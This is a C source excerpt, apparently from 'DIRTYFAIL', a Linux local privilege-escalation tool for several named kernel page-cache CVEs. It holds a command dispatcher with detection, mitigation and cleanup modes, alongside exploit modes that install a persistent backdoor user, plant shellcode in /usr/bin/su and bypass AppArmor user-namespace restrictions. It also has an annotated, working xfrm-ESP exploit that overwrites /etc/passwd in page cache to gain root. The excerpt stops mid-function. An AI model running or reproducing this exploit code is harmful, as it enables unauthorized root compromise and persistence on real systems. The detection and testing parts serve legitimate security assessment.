" --aa-bypass force the AppArmor unprivileged-userns bypass\n"
" (auto-armed when restricted profile is detected)\n"
"\n"
"Exit codes:\n"
" 0 not vulnerable / clean 2 vulnerable 5 exploit succeeded\n"
" 1 test error 3 exploit failed 4 preconditions missing\n"
"\n"
"AUTHORIZED TESTING ONLY. Run only on systems you own or are explicitly\n"
"engaged to assess. The --exploit modes corrupt /etc/passwd in the\n"
"kernel page cache; cleanup with --cleanup or `echo 3 > /proc/sys/vm/drop_caches`.\n",
prog);
}
enum mode {
MODE_SCAN,
MODE_CHECK_COPYFAIL,
MODE_CHECK_ESP,
MODE_CHECK_ESP6,
MODE_CHECK_RXRPC,
MODE_CHECK_GCM,
MODE_EXPLOIT_COPYFAIL,
MODE_EXPLOIT_ESP,
MODE_EXPLOIT_ESP6,
MODE_EXPLOIT_RXRPC,
MODE_EXPLOIT_GCM,
MODE_EXPLOIT_BACKDOOR,
MODE_EXPLOIT_SU,
MODE_CLEANUP,
MODE_CLEANUP_BACKDOOR,
MODE_CLEANUP_SU,
MODE_MITIGATE,
MODE_CLEANUP_MITIGATE,
MODE_LIST_STATE,
MODE_HELP,
MODE_VERSION,
};
#define DIRTYFAIL_VERSION "0.1.0"
int main(int argc, char **argv)
{
/* Pick up flags that need to survive AA-bypass fork+re-exec via env.
* The child re-execs with its own argv (stage tags only), so flags
* set in the parent's argv don't reach the child unless we propagate
* them through env vars. --json is the main case: without this, the
* child's log_* output goes to stdout and corrupts the JSON document
* the parent is building. */
if (getenv("DIRTYFAIL_JSON")) {
dirtyfail_json = true;
dirtyfail_use_color = false;
}
/* If we're a re-exec from the apparmor bypass dance, route to the
* stage handler immediately. Stage 1 re-execs to stage 2; stage 2
* unshares + raises caps, then either:
* (a) DIRTYFAIL_INNER_MODE is set → we're a fork-based exploit
* child. Dispatch to the inner handler and exit. Parent
* (init ns) reaps us and continues with verify + su.
* (b) Not set → legacy `--aa-bypass` whole-process mode; fall
* through to the normal main() flow with rewritten argv. */
if (apparmor_bypass_is_stage(argc, argv)) {
int new_argc = argc;
char **new_argv = argv;
if (apparmor_bypass_run_stage(argc, argv, &new_argc, &new_argv) != 0) {
fprintf(stderr, "apparmor bypass stage failed\n");
return 1;
}
const char *inner = getenv("DIRTYFAIL_INNER_MODE");
if (inner && *inner) {
df_result_t r = DF_TEST_ERROR;
if (strcmp(inner, "esp") == 0) r = dirtyfrag_esp_exploit_inner();
else if (strcmp(inner, "esp6") == 0) r = dirtyfrag_esp6_exploit_inner();
else if (strcmp(inner, "rxrpc") == 0) r = dirtyfrag_rxrpc_exploit_inner();
else if (strcmp(inner, "gcm") == 0) r = copyfail_gcm_exploit_inner();
else if (strcmp(inner, "esp-probe") == 0) r = dirtyfrag_esp_active_probe_inner();
else if (strcmp(inner, "esp6-probe") == 0) r = dirtyfrag_esp6_active_probe_inner();
else if (strcmp(inner, "rxrpc-probe") == 0) r = dirtyfrag_rxrpc_active_probe_inner();
else if (strcmp(inner, "gcm-probe") == 0) r = copyfail_gcm_active_probe_inner();
else if (strcmp(inner, "backdoor-install") == 0) r = backdoor_install_inner();
else if (strcmp(inner, "backdoor-cleanup") == 0) r = backdoor_cleanup_inner();
else {
fprintf(stderr, "unknown DIRTYFAIL_INNER_MODE: %s\n", inner);
r = DF_TEST_ERROR;
}
return (int)r;
}
argc = new_argc;
argv = new_argv;
}
enum mode m = MODE_SCAN;
bool do_shell = true;
bool aa_bypass = false;
static const struct option opts[] = {
{"scan", no_argument, NULL, 'S'},
{"check-copyfail", no_argument, NULL, 1 },
{"check-esp", no_argument, NULL, 2 },
{"check-rxrpc", no_argument, NULL, 3 },
{"check-esp6", no_argument, NULL, 9 },
{"check-gcm", no_argument, NULL, 10 },
{"exploit-copyfail", no_argument, NULL, 4 },
{"exploit-esp", no_argument, NULL, 5 },
{"exploit-esp6", no_argument, NULL, 11 },
{"exploit-rxrpc", no_argument, NULL, 7 },
{"exploit-gcm", no_argument, NULL, 12 },
{"exploit-backdoor", no_argument, NULL, 13 },
{"cleanup", no_argument, NULL, 6 },
{"cleanup-backdoor", no_argument, NULL, 14 },
{"mitigate", no_argument, NULL, 15 },
{"cleanup-mitigate", no_argument, NULL, 16 },
{"active", no_argument, NULL, 17 },
{"exploit-su", no_argument, NULL, 18 },
{"cleanup-su", no_argument, NULL, 19 },
{"no-revert", no_argument, NULL, 20 },
{"json", no_argument, NULL, 21 },
{"list-state", no_argument, NULL, 22 },
{"no-shell", no_argument, NULL, 'n'},
{"no-color", no_argument, NULL, 'C'},
{"aa-bypass", no_argument, NULL, 8 },
{"help", no_argument, NULL, 'h'},
{"version", no_argument, NULL, 'V'},
{0,0,0,0}
};
int c;
while ((c = getopt_long(argc, argv, "ShVnC", opts, NULL)) != -1) {
switch (c) {
case 'S': m = MODE_SCAN; break;
case 1 : m = MODE_CHECK_COPYFAIL; break;
case 2 : m = MODE_CHECK_ESP; break;
case 3 : m = MODE_CHECK_RXRPC; break;
case 4 : m = MODE_EXPLOIT_COPYFAIL; break;
case 5 : m = MODE_EXPLOIT_ESP; break;
case 7 : m = MODE_EXPLOIT_RXRPC; break;
case 6 : m = MODE_CLEANUP; break;
case 9 : m = MODE_CHECK_ESP6; break;
case 10 : m = MODE_CHECK_GCM; break;
case 11 : m = MODE_EXPLOIT_ESP6; break;
case 12 : m = MODE_EXPLOIT_GCM; break;
case 13 : m = MODE_EXPLOIT_BACKDOOR; break;
case 14 : m = MODE_CLEANUP_BACKDOOR; break;
case 15 : m = MODE_MITIGATE; break;
case 16 : m = MODE_CLEANUP_MITIGATE; break;
case 17 : dirtyfail_active_probes = true; break;
case 18 : m = MODE_EXPLOIT_SU; break;
case 19 : m = MODE_CLEANUP_SU; break;
case 20 : dirtyfail_no_revert = true; break;
case 21 : dirtyfail_json = true;
dirtyfail_use_color = false;
/* Propagate through fork+re-exec for AA bypass children */
setenv("DIRTYFAIL_JSON", "1", 1);
break;
case 22 : m = MODE_LIST_STATE; break;
case 'n': do_shell = false; break;
case 'C': dirtyfail_use_color = false; break;
case 8 : aa_bypass = true; break;
case 'h': m = MODE_HELP; break;
case 'V': m = MODE_VERSION; break;
default : usage(argv[0]); return 1;
}
}
if (m == MODE_HELP) { usage(argv[0]); return 0; }
if (m == MODE_VERSION) { puts("DIRTYFAIL " DIRTYFAIL_VERSION); return 0; }
/* Exploit modes now do their OWN fork-based AA bypass internally
* (parent stays in init ns for the post-exploit `su` to drop into
* REAL init-ns root). We only arm the legacy whole-process bypass
* when the operator explicitly requests it via --aa-bypass — that
* path is mostly useful for debugging the bypass mechanics in
* isolation, not for actual exploitation. */
if (aa_bypass) {
log_warn("--aa-bypass: arming legacy whole-process bypass");
log_hint("note: exploit modes now do their own fork-based bypass; "
"this flag is for debugging only and may break su afterwards.");
if (apparmor_bypass_arm_and_relaunch(argc, argv) != 0) {
log_warn("apparmor bypass failed (%s) — continuing un-bypassed",
strerror(errno));
}
}
if (!dirtyfail_json) {
if (dirtyfail_use_color) fputs("\033[1;35m", stdout);
fputs(BANNER, stdout);
if (dirtyfail_use_color) fputs("\033[0m", stdout);
fputc('\n', stdout);
}
df_result_t r = DF_OK;
switch (m) {
case MODE_SCAN: {
log_step("running full scan — five detectors\n");
df_result_t a = copyfail_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t b = dirtyfrag_esp_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t b6 = dirtyfrag_esp6_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t c2 = dirtyfrag_rxrpc_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t g = copyfail_gcm_detect(); if (!dirtyfail_json) fputc('\n', stdout);
const char *label[] = {
[DF_OK] = "not vulnerable",
[DF_TEST_ERROR] = "test error",
[DF_VULNERABLE] = "VULNERABLE",
[DF_PRECOND_FAIL] = "preconditions missing",
};
const char *json_label[] = {
[DF_OK] = "not_vulnerable",
[DF_TEST_ERROR] = "test_error",
[DF_VULNERABLE] = "vulnerable",
[DF_PRECOND_FAIL] = "preconds_missing",
};
if (!dirtyfail_json) {
log_step("scan summary:");
log_hint(" Copy Fail (algif_aead, CVE-2026-31431): %s", label[a & 7]);
log_hint(" Dirty Frag ESP v4 (CVE-2026-43284): %s", label[b & 7]);
log_hint(" Dirty Frag ESP v6 (CVE-2026-43284 v6): %s", label[b6 & 7]);
log_hint(" Dirty Frag RxRPC (CVE-2026-43500): %s", label[c2 & 7]);
log_hint(" Copy Fail GCM variant (xfrm rfc4106): %s", label[g & 7]);
}
if (a == DF_VULNERABLE || b == DF_VULNERABLE || b6 == DF_VULNERABLE ||
c2 == DF_VULNERABLE || g == DF_VULNERABLE)
r = DF_VULNERABLE;
else if (a == DF_TEST_ERROR || b == DF_TEST_ERROR || b6 == DF_TEST_ERROR ||
c2 == DF_TEST_ERROR || g == DF_TEST_ERROR)
r = DF_TEST_ERROR;
else
r = DF_OK;
if (dirtyfail_json) {
struct utsname u; uname(&u);
const char *summary = json_label[r & 7];
printf("{\n");
printf(" \"tool\": \"dirtyfail\",\n");
printf(" \"version\": \"" DIRTYFAIL_VERSION "\",\n");
printf(" \"hostname\": \"%s\",\n", u.nodename);
printf(" \"kernel\": \"%s\",\n", u.release);
printf(" \"machine\": \"%s\",\n", u.machine);
printf(" \"active_probes\": %s,\n",
dirtyfail_active_probes ? "true" : "false");
printf(" \"results\": [\n");
printf(" {\"cve\": \"CVE-2026-31431\", \"name\": \"copyfail\", \"status\": \"%s\"},\n", json_label[a & 7]);
printf(" {\"cve\": \"CVE-2026-43284\", \"name\": \"dirtyfrag-esp\", \"status\": \"%s\"},\n", json_label[b & 7]);
printf(" {\"cve\": \"CVE-2026-43284-v6\", \"name\": \"dirtyfrag-esp6\", \"status\": \"%s\"},\n", json_label[b6 & 7]);
printf(" {\"cve\": \"CVE-2026-43500\", \"name\": \"dirtyfrag-rxrpc\", \"status\": \"%s\"},\n", json_label[c2 & 7]);
printf(" {\"cve\": \"CVE-2026-31431-gcm\", \"name\": \"copyfail-gcm\", \"status\": \"%s\"}\n", json_label[g & 7]);
printf(" ],\n");
printf(" \"summary\": \"%s\"\n", summary);
printf("}\n");
}
break;
}
case MODE_CHECK_COPYFAIL: r = copyfail_detect(); break;
case MODE_CHECK_ESP: r = dirtyfrag_esp_detect(); break;
case MODE_CHECK_ESP6: r = dirtyfrag_esp6_detect(); break;
case MODE_CHECK_RXRPC: r = dirtyfrag_rxrpc_detect(); break;
case MODE_CHECK_GCM: r = copyfail_gcm_detect(); break;
case MODE_EXPLOIT_COPYFAIL:
log_warn("running real PoC for Copy Fail (CVE-2026-31431)");
r = copyfail_exploit(do_shell);
break;
case MODE_EXPLOIT_ESP:
log_warn("running real PoC for Dirty Frag xfrm-ESP (CVE-2026-43284)");
r = dirtyfrag_esp_exploit(do_shell);
break;
case MODE_EXPLOIT_RXRPC:
log_warn("running real PoC for Dirty Frag RxRPC (CVE-2026-43500)");
r = dirtyfrag_rxrpc_exploit(do_shell);
break;
case MODE_EXPLOIT_ESP6:
log_warn("running real PoC for Dirty Frag IPv6 xfrm-ESP");
r = dirtyfrag_esp6_exploit(do_shell);
break;
case MODE_EXPLOIT_GCM:
log_warn("running real PoC for Copy Fail GCM variant (rfc4106)");
r = copyfail_gcm_exploit(do_shell);
break;
case MODE_EXPLOIT_BACKDOOR:
log_warn("installing PERSISTENT backdoor user 'dirtyfail' (page-cache only)");
r = backdoor_install(do_shell);
break;
case MODE_CLEANUP_BACKDOOR:
r = backdoor_cleanup();
break;
case MODE_EXPLOIT_SU:
log_warn("planting x86_64 shellcode at /usr/bin/su entry point (page cache)");
r = exploit_su_shellcode(do_shell);
break;
case MODE_CLEANUP_SU:
r = cleanup_su_shellcode();
break;
case MODE_MITIGATE:
r = mitigate_apply();
break;
case MODE_CLEANUP_MITIGATE:
r = mitigate_revert();
break;
case MODE_LIST_STATE: {
log_step("--list-state: scanning /var/tmp for stashed dirtyfail state files");
bool any = false;
if (backdoor_list_state()) any = true;
if (exploit_su_list_state()) any = true;
if (!any) {
log_ok("no dirtyfail state files present — system is clean");
} else {
log_hint("(state files only describe what was planted — they do");
log_hint(" not by themselves prove the page cache is still poisoned;");
log_hint(" run `--cleanup` / `--cleanup-backdoor` / `--cleanup-su`");
log_hint(" to evict + restore.)");
}
r = DF_OK;
break;
}
case MODE_CLEANUP:
log_step("evicting /etc/passwd page cache");
if (geteuid() != 0) {
/* POSIX_FADV_DONTNEED on a read-only fd held by a non-root
* user *silently no-ops* on Linux — fadvise returns 0 but
* does not actually evict any pages. The only path that
* works without write access is `drop_caches`, which
* itself needs root. So warn the operator clearly. */
log_warn("running as non-root: POSIX_FADV_DONTNEED will return 0 "
"but NOT evict any pages (kernel ignores it for readers "
"without write access). The page-cache STORE will persist "
"until eviction by memory pressure or reboot.");
log_warn("re-run as 'sudo dirtyfail --cleanup' to drop_caches.");
} else {
int fd = open("/etc/passwd", O_RDONLY);
if (fd >= 0) {
#ifdef POSIX_FADV_DONTNEED
posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
#endif
close(fd);
}
log_step("dropping caches");
if (drop_caches()) log_ok("drop_caches OK");
else log_warn("drop_caches failed: %s", strerror(errno));
}
r = DF_OK;
break;
default:
usage(argv[0]);
return 1;
}
return (int)r;
}
+804
View File
@@ -0,0 +1,804 @@
/*
* DIRTYFAIL dirtyfrag_esp.c Dirty Frag xfrm-ESP variant
* CVE-2026-43284
*
* BACKGROUND
* ----------
* In Linux, esp_input() runs the AEAD decryption in-place on the
* incoming skb. Before that, an skb whose payload sits in a frag (i.e.
* not in the linear head the case that arises when userspace plants
* a page via splice()) is supposed to be cloned out into kernel-owned
* memory by skb_cow_data(). The bug:
*
* if (!skb_cloned(skb)) {
* if (!skb_is_nonlinear(skb)) {
* nfrags = 1;
* goto skip_cow;
* } else if (!skb_has_frag_list(skb)) {
* nfrags = skb_shinfo(skb)->nr_frags;
* nfrags++;
* goto skip_cow; // <-- vulnerable branch
* }
* }
*
* If the skb has frags but no frag_list, esp_input skips the COW and
* runs in-place AEAD on the user-supplied page. The same authencesn
* scratch-write that powers Copy Fail then lands at file offset
* (assoclen + cryptlen) inside that page. The 4 STOREd bytes are
* `seq_hi` from the SA's replay_esn state, which userspace controls
* via XFRMA_REPLAY_ESN_VAL on SA registration.
*
* Net result: same 4-byte arbitrary-offset write into a page-cache
* page as Copy Fail, but reachable via the xfrm path *even when
* algif_aead is blacklisted as a Copy Fail mitigation*.
*
* COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker
* must enter a fresh user namespace first. This is allowed by default
* on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns).
*
* DETECTION STRATEGY
* ------------------
* Precondition-based: we report VULNERABLE when *all* of these hold:
* - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched
* - esp4 module loadable (we don't insmod; rely on autoload)
* - unprivileged user namespace creation works
*
* Avoiding the actual primitive in detect mode keeps the system
* undisturbed (no namespaces created in the parent, no encap sockets,
* no transient SAs). The exploit path runs the full primitive for real.
*
* EXPLOIT STRATEGY
* ----------------
* Same UID-flip as Copy Fail, but driven through xfrm:
*
* 1. fork() parent stays in init userns to call su afterwards
* 2. child: unshare(CLONE_NEWUSER | CLONE_NEWNET)
* 3. child: write deny /proc/self/setgroups
* 4. child: write "0 <real_uid> 1" /proc/self/uid_map (and gid_map)
* 5. child: ioctl SIOCSIFFLAGS to bring lo UP
* 6. child: open NETLINK_XFRM, register SA with:
* proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN,
* alg=authencesn(hmac(sha256),cbc(aes)) (zero keys),
* encap=ESPINUDP sport=dport=4500,
* replay_esn.seq_hi = "0000" (the 4 bytes that will land)
* 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP
* and udp_send connected to 127.0.0.1:4500
* 8. child: pipe(); vmsplice forged ESP wire header (24 bytes)
* splice /etc/passwd at uid_off, len 16 splice pipe udp_send
* 9. child: recvmsg drives the kernel through the esp_input path,
* firing the 4-byte STORE of "0000" into /etc/passwd
* at the user's UID offset
* 10. child: exits, parent verifies via fresh open of /etc/passwd
* 11. parent: execlp("su", username) PAM checks /etc/shadow on
* disk (untouched), gets right password, setuid(0) lands
* us at root because the page-cache copy of /etc/passwd
* now lists us as UID 0.
*/
#include "dirtyfrag_esp.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#ifdef __linux__
#include <sys/syscall.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif
/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in <linux/udp.h>, but that header
* conflicts with <netinet/udp.h> over `struct udphdr` and we don't
* actually need the struct. The kernel constants are stable, so we
* just hard-code them as fallbacks (the #ifndef makes this a no-op if
* the toolchain happens to expose them already). */
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP 50
#endif
#ifndef __linux__
#define CLONE_NEWUSER 0x10000000
#define CLONE_NEWNET 0x40000000
#define IFF_UP 0x01
#define IFF_RUNNING 0x40
#define SIOCSIFFLAGS 0x8914
struct sockaddr_in { int dummy; };
struct ifreq { int dummy; };
__attribute__((unused))
static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; }
__attribute__((unused))
static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d)
{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
__attribute__((unused))
static int ioctl (int a, unsigned long b, ...)
{ (void)a;(void)b; errno=ENOSYS; return -1; }
#else
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
unsigned int flags);
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xDEADBE10
#define MARKER "0000"
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_detect(void)
{
log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection");
int km = -1, kn = -1;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x", km, kn);
/* The vulnerable branch was introduced in 2017 (cac2661c53f3) and
* the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily
* tell whether a particular distro kernel has the backport, so we
* report based on prereq presence and let the operator decide. */
/* esp4 / esp6 modules. They autoload on first XFRM SA registration,
* but we want to know if the build supports them at all. /proc/modules
* lists currently-loaded; that's a strong positive signal. */
bool esp4 = kmod_loaded("esp4");
bool esp6 = kmod_loaded("esp6");
log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no");
log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no");
bool userns = unprivileged_userns_allowed();
log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
if (!userns) {
log_ok("xfrm-ESP variant unreachable without unprivileged userns");
log_hint("on Ubuntu, this is the expected hardening — but the RxRPC "
"variant of Dirty Frag may still be reachable. Run with "
"--check-rxrpc.");
return DF_PRECOND_FAIL;
}
if (!esp4 && !esp6) {
log_hint("no esp4/esp6 currently loaded; the kernel will autoload them "
"on first SA registration. We treat this as still vulnerable.");
}
/* On hardened distros (Ubuntu 26.04+) caps are stripped inside the
* userns even after our bypass kernel may still have the bug but
* unprivileged users can't reach it. Report that honestly rather
* than claiming VULNERABLE. */
if (apparmor_userns_caps_blocked()) {
log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor "
"policy denies CAP_NET_ADMIN inside any unprivileged userns.");
log_hint("unprivileged exploitation is blocked; real root can still "
"reach the kernel bug. Apply the kernel patch as soon as your "
"distro ships it.");
return DF_PRECOND_FAIL;
}
if (dirtyfail_active_probes) {
log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel");
df_result_t pr = dirtyfrag_esp_active_probe();
if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
log_warn("active probe inconclusive — falling back to precondition verdict");
}
log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration "
"available, kernel within affected window");
log_warn("apply mainline patch f4c50a4034e6 or your distro's backport");
log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist "
"esp4/esp6 in /etc/modprobe.d/");
log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
return DF_VULNERABLE;
}
/* ---------------------------------------------------------------- *
* Exploit only compiled with full bodies on Linux.
* ---------------------------------------------------------------- */
#ifdef __linux__
/* Write a small string to a /proc file. */
static bool write_proc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t want = strlen(value);
ssize_t got = write(fd, value, want);
close(fd);
return got == want;
}
/* ---- Netlink XFRM SA registration --------------------------------- *
*
* The XFRM SA registration is built by hand. Each attribute is a 4-byte
* aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by
* payload. The total nlmsg length is filled in last.
*
* Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi.
*/
static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4])
{
char buf[2048] = {0};
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
struct xfrm_usersa_info *usa =
(struct xfrm_usersa_info *)NLMSG_DATA(nlh);
nlh->nlmsg_type = XFRM_MSG_NEWSA;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
nlh->nlmsg_seq = 1;
/* Selector: src/dst 127.0.0.1, IPv4 */
usa->sel.daddr.a4 = htonl(0x7f000001);
usa->sel.saddr.a4 = htonl(0x7f000001);
usa->sel.family = AF_INET;
usa->sel.prefixlen_d = 32;
usa->sel.prefixlen_s = 32;
usa->id.daddr.a4 = htonl(0x7f000001);
usa->id.spi = htonl(ESP_SPI);
usa->id.proto = IPPROTO_ESP;
usa->saddr.a4 = htonl(0x7f000001);
usa->lft.soft_byte_limit = (uint64_t)-1;
usa->lft.hard_byte_limit = (uint64_t)-1;
usa->lft.soft_packet_limit = (uint64_t)-1;
usa->lft.hard_packet_limit = (uint64_t)-1;
usa->reqid = 0x1234;
usa->family = AF_INET;
usa->mode = XFRM_MODE_TRANSPORT;
usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */
usa->flags = XFRM_STATE_ESN;
size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
size_t attrs = 0;
char *abuf = buf + hdrlen;
/*
* The kernel's xfrm code does NOT accept `authencesn(...)` as a
* single XFRMA_ALG_AEAD attribute it's a composition that has
* to be assembled from separate auth + crypt parts. We register:
* XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV
* XFRMA_ALG_CRYPT : cbc(aes) with 16-byte key
*
* The kernel internally wires these into authencesn(hmac(sha256),
* cbc(aes)) when it sees XFRM_STATE_ESN on the SA.
*/
{ /* XFRMA_ALG_AUTH_TRUNC */
struct xfrm_algo_auth *aa;
unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_AUTH_TRUNC;
r->rta_len = RTA_LENGTH(dlen);
aa = (struct xfrm_algo_auth *)RTA_DATA(r);
memset(aa, 0, dlen);
strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
aa->alg_key_len = 32 * 8; /* bits */
aa->alg_trunc_len = 128; /* bits — truncated MAC width */
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ALG_CRYPT */
struct xfrm_algo *ea;
unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_CRYPT;
r->rta_len = RTA_LENGTH(dlen);
ea = (struct xfrm_algo *)RTA_DATA(r);
memset(ea, 0, dlen);
strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
ea->alg_key_len = 16 * 8;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */
{
struct xfrm_replay_state_esn *esn;
unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_REPLAY_ESN_VAL;
r->rta_len = RTA_LENGTH(dlen);
esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
memset(esn, 0, dlen);
esn->bmp_len = 1;
esn->oseq = 0;
esn->seq = 100;
esn->oseq_hi = 0;
memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */
esn->replay_window = 32;
attrs += RTA_SPACE(dlen);
}
/* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */
{
struct xfrm_encap_tmpl *enc;
unsigned short dlen = sizeof(*enc);
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ENCAP;
r->rta_len = RTA_LENGTH(dlen);
enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
memset(enc, 0, dlen);
enc->encap_type = UDP_ENCAP_ESPINUDP;
enc->encap_sport = htons(ENCAP_PORT);
enc->encap_dport = htons(ENCAP_PORT);
enc->encap_oa.a4 = 0;
attrs += RTA_SPACE(dlen);
}
nlh->nlmsg_len = hdrlen + attrs;
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
if (sendto(nl, buf, nlh->nlmsg_len, 0,
(struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
return false;
/* Drain ACK */
char ack[4096];
ssize_t n = recv(nl, ack, sizeof(ack), 0);
if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
struct nlmsghdr *r = (struct nlmsghdr *)ack;
if (r->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
if (e->error != 0) {
log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error));
return false;
}
}
return true;
}
/* Bring loopback up inside the new netns. */
static bool bring_lo_up(void)
{
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s < 0) return false;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
ifr.ifr_flags = IFF_UP | IFF_RUNNING;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
return rc == 0;
}
/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload
* is a page-cache page from `target_path`, planted via splice at
* `splice_off`. The kernel STORE lands ~14 bytes into the spliced
* region (the v4 path has no V6_STORE_SHIFT-style offset). */
static bool trigger_store_at(const char *target_path, loff_t splice_off)
{
/* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so
* incoming UDP frames are rerouted into xfrm_input -> esp_input. */
int udp_recv = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_recv < 0) return false;
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(ENCAP_PORT),
.sin_addr.s_addr = htonl(0x7f000001),
};
int reuse = 1;
setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("bind udp_recv: %s", strerror(errno));
close(udp_recv); return false;
}
int encap = UDP_ENCAP_ESPINUDP;
if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno));
close(udp_recv); return false;
}
/* udp_send: connect to udp_recv. Packets we splice here will arrive
* at udp_recv via loopback and feed xfrm_input. */
int udp_send = socket(AF_INET, SOCK_DGRAM, 0);
if (udp_send < 0) { close(udp_recv); return false; }
if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("connect udp_send: %s", strerror(errno));
close(udp_recv); close(udp_send); return false;
}
/* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes.
* IV value doesn't matter auth check fails after the STORE. */
unsigned char wire_hdr[24];
*(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */
memset(wire_hdr + 8, 0xCC, 16);
/* Open the target file for splicing. */
int pfd = open(target_path, O_RDONLY);
if (pfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
close(udp_recv); close(udp_send); return false;
}
int p[2];
if (pipe(p) < 0) {
log_bad("pipe: %s", strerror(errno));
close(pfd); close(udp_recv); close(udp_send); return false;
}
/* vmsplice the wire header into the pipe (24 bytes). */
struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
log_bad("vmsplice header: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice 16 bytes of target's page cache from splice_off. */
loff_t off = splice_off;
if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
log_bad("splice file->pipe: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
/* splice the whole 40-byte payload from pipe to udp_send. */
